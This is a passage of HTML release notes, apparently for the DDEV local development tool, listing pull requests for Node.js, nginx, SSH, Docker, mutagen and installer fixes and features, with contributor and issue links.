<li>fix(nodejs): preserve nodejs_version in config.yaml, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4002111935" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8186" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8186/hovercard" href="https://github.com/ddev/ddev/issues/8186">#8186</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624943154" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8462" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8462/hovercard" href="https://github.com/ddev/ddev/pull/8462">#8462</a></li>
<li>fix(nodejs): move N_PREFIX to /usr/local/n and make it writable, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4632809900" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8465" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8465/hovercard" href="https://github.com/ddev/ddev/issues/8465">#8465</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4635081802" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8467" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8467/hovercard" href="https://github.com/ddev/ddev/pull/8467">#8467</a></li>
<li>fix(nginx): suppress favicon.ico and robots.txt 404 logs, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2869143534" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7010" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7010/hovercard" href="https://github.com/ddev/ddev/issues/7010">#7010</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624409272" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8461" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8461/hovercard" href="https://github.com/ddev/ddev/pull/8461">#8461</a></li>
<li>fix(ssh): use RawCmd to avoid double-sourcing bashrc, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1835843764" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5232" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5232/hovercard" href="https://github.com/ddev/ddev/issues/5232">#5232</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624030279" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8460" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8460/hovercard" href="https://github.com/ddev/ddev/pull/8460">#8460</a></li>
<li>docs: install util-linux-extra in Docker setup, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332343177" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8350" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8350/hovercard" href="https://github.com/ddev/ddev/issues/8350">#8350</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4666141620" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8480" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8480/hovercard" href="https://github.com/ddev/ddev/pull/8480">#8480</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4666141620" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8480" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8480/hovercard" href="https://github.com/ddev/ddev/pull/8480">#8480</a></li>
<li>feat: improve ddev list/describe table layout, add OSC 8 terminal hyperlinks, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1991790083" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5535" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5535/hovercard" href="https://github.com/ddev/ddev/issues/5535">#5535</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2249382464" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6113" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6113/hovercard" href="https://github.com/ddev/ddev/issues/6113">#6113</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4653278220" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8474" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8474/hovercard" href="https://github.com/ddev/ddev/pull/8474">#8474</a>)  [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4653278220" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8474" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8474/hovercard" href="https://github.com/ddev/ddev/pull/8474">#8474</a></li>
<li>fix: skip OS-generated metadata files in custom-config detection and .ddev/.gitignore, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4475692720" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8418" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8418/hovercard" href="https://github.com/ddev/ddev/issues/8418">#8418</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4665439123" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8478" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8478/hovercard" href="https://github.com/ddev/ddev/pull/8478">#8478</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4665439123" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8478" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8478/hovercard" href="https://github.com/ddev/ddev/pull/8478">#8478</a></li>
<li>fix(mutagen): detect missing docker CLI early, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614824791" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8457" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8457/hovercard" href="https://github.com/ddev/ddev/issues/8457">#8457</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4665774207" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8479" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8479/hovercard" href="https://github.com/ddev/ddev/pull/8479">#8479</a></li>
<li>docs(docker): add troubleshooting for permission denied, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4645427389" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8471" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8471/hovercard" href="https://github.com/ddev/ddev/issues/8471">#8471</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4675675317" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8483" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8483/hovercard" href="https://github.com/ddev/ddev/pull/8483">#8483</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4675675317" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8483" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8483/hovercard" href="https://github.com/ddev/ddev/pull/8483">#8483</a></li>
<li>test(quickstart): update shopware6 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4675529151" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8482" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8482/hovercard" href="https://github.com/ddev/ddev/pull/8482">#8482</a></li>
<li>fix: warn when CAROOT is set but CA files are inaccessible, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4677876085" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8485" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8485/hovercard" href="https://github.com/ddev/ddev/issues/8485">#8485</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4678327612" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8486" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8486/hovercard" href="https://github.com/ddev/ddev/pull/8486">#8486</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4678327612" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8486" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8486/hovercard" href="https://github.com/ddev/ddev/pull/8486">#8486</a></li>
<li>fix(tui): prevent docker/cli stdin from consuming TUI shortcuts, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4562065445" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8440" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8440/hovercard" href="https://github.com/ddev/ddev/issues/8440">#8440</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4685382113" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8489" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8489/hovercard" href="https://github.com/ddev/ddev/pull/8489">#8489</a></li>
<li>fix: add /usr/local/n/bin to sudo secure_path, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4685293783" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8488" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8488/hovercard" href="https://github.com/ddev/ddev/issues/8488">#8488</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4685872989" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8490" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8490/hovercard" href="https://github.com/ddev/ddev/pull/8490">#8490</a></li>
<li>fix(start): show warnings from log-stderr.sh on start, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4563471219" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8441" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8441/hovercard" href="https://github.com/ddev/ddev/issues/8441">#8441</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4675066040" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8481" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8481/hovercard" href="https://github.com/ddev/ddev/pull/8481">#8481</a></li>
<li>build(deps): bump go dependencies, migrate to go-github v88 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4694258253" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8492" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8492/hovercard" href="https://github.com/ddev/ddev/pull/8492">#8492</a></li>
<li>test(quickstart): pin <code>@sveltejs/adapter-node@5.5.4</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4701858950" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8497" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8497/hovercard" href="https://github.com/ddev/ddev/pull/8497">#8497</a></li>
<li>test(docs): Ignore link check URLs [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4702819191" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8499" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8499/hovercard" href="https://github.com/ddev/ddev/pull/8499">#8499</a></li>
<li>build: bump actions/checkout from 6 to 7 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4718149342" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8504" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8504/hovercard" href="https://github.com/ddev/ddev/pull/8504">#8504</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4718149342" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8504" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8504/hovercard" href="https://github.com/ddev/ddev/pull/8504">#8504</a></li>
<li>fix: restrict XDG_CONFIG_HOME to Linux, add DDEV_XDG_CONFIG_HOME for cross-platform overrides, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4694586960" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8493" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8493/hovercard" href="https://github.com/ddev/ddev/issues/8493">#8493</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4694816575" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8494" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8494/hovercard" href="https://github.com/ddev/ddev/pull/8494">#8494</a></li>
<li>fix(webserver): prevent recursion in global web command wrappers, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2790468327" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6902" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/6902/hovercard" href="https://github.com/ddev/ddev/pull/6902">#6902</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4701412145" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8495" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8495/hovercard" href="https://github.com/ddev/ddev/pull/8495">#8495</a></li>
<li>fix(nodejs): always install gulp-cli and yarn, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4701417432" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8496" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8496/hovercard" href="https://github.com/ddev/ddev/issues/8496">#8496</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4702408419" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8498" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8498/hovercard" href="https://github.com/ddev/ddev/pull/8498">#8498</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4702408419" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8498" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8498/hovercard" href="https://github.com/ddev/ddev/pull/8498">#8498</a></li>
<li>feat(windows): support Debian and Kali WSL2 distros in GUI installer, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559357943" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8439" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8439/hovercard" href="https://github.com/ddev/ddev/issues/8439">#8439</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4641003281" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8468" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8468/hovercard" href="https://github.com/ddev/ddev/issues/8468">#8468</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4632394063" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8464" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8464/hovercard" href="https://github.com/ddev/ddev/pull/8464">#8464</a></li>
<li>build: Fix gomt error that crept in [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721491247" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8509" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8509/hovercard" href="https://github.com/ddev/ddev/pull/8509">#8509</a></li>
<li>test: Add script to compare start time performance [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721622618" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8510" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8510/hovercard" href="https://github.com/ddev/ddev/pull/8510">#8510</a></li>
<li>test(quickstart): remove pin for <code>@sveltejs/adapter-node</code>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4701858950" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8497" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8497/hovercard" href="https://github.com/ddev/ddev/pull/8497">#8497</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4723621004" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8511" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8511/hovercard" href="https://github.com/ddev/ddev/pull/8511">#8511</a></li>
<li>ci(github): add brew sandbox setup, remove obsolete env, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4642259004" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8469" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8469/hovercard" href="https://github.com/ddev/ddev/pull/8469">#8469</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4724822655" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8512" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8512/hovercard" href="https://github.com/ddev/ddev/pull/8512">#8512</a></li>
<li>fix(mysql): guard ENV HOME injection to db context only, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721459214" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8508" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8508/hovercard" href="https://github.com/ddev/ddev/issues/8508">#8508</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4725527190" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8513" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8513/hovercard" href="https://github.com/ddev/ddev/pull/8513">#8513</a></li>
<li>fix(docker): do not cache build on start, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4549207054" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8433" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8433/hovercard" href="https://github.com/ddev/ddev/issues/8433">#8433</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4718896990" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8506" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8506/hovercard" href="https://github.com/ddev/ddev/pull/8506">#8506</a></li>
<li>feat(drupal): Support new dr command built into drupal11.4+, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4710077190" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8500" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8500/hovercard" href="https://github.com/ddev/ddev/issues/8500">#8500</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4720878653" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8507" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8507/hovercard" href="https://github.com/ddev/ddev/pull/8507">#8507</a></li>
<li>fix(dbeaver): Add flatpak user binary path to search list, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4727881183" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8517" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8517/hovercard" href="https://github.com/ddev/ddev/issues/8517">#8517</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nickchomey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nickchomey">@nickchomey</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4727903372" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8518" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8518/hovercard" href="https://github.com/ddev/ddev/pull/8518">#8518</a></li>
<li>refactor(auth-ssh): remove build step, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4711855724" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8501" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8501/hovercard" href="https://github.com/ddev/ddev/issues/8501">#8501</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4716695362" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8503" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8503/hovercard" href="https://github.com/ddev/ddev/pull/8503">#8503</a></li>
<li>feat: allow mutagen with use-hardened-images, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1163134802" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/3680" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/3680/hovercard" href="https://github.com/ddev/ddev/pull/3680">#3680</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4685988680" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8491" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8491/hovercard" href="https://github.com/ddev/ddev/pull/8491">#8491</a></li>
<li>feat(docker): respect docker-buildx from snap on linux, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4727709566" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8515" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8515/hovercard" href="https://github.com/ddev/ddev/issues/8515">#8515</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728073401" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8519" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8519/hovercard" href="https://github.com/ddev/ddev/pull/8519">#8519</a></li>
<li>docs: replace newgrp with sg for docker group activation, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332343177" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8350" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8350/hovercard" href="https://github.com/ddev/ddev/issues/8350">#8350</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736396280" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8524" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8524/hovercard" href="https://github.com/ddev/ddev/pull/8524">#8524</a></li>
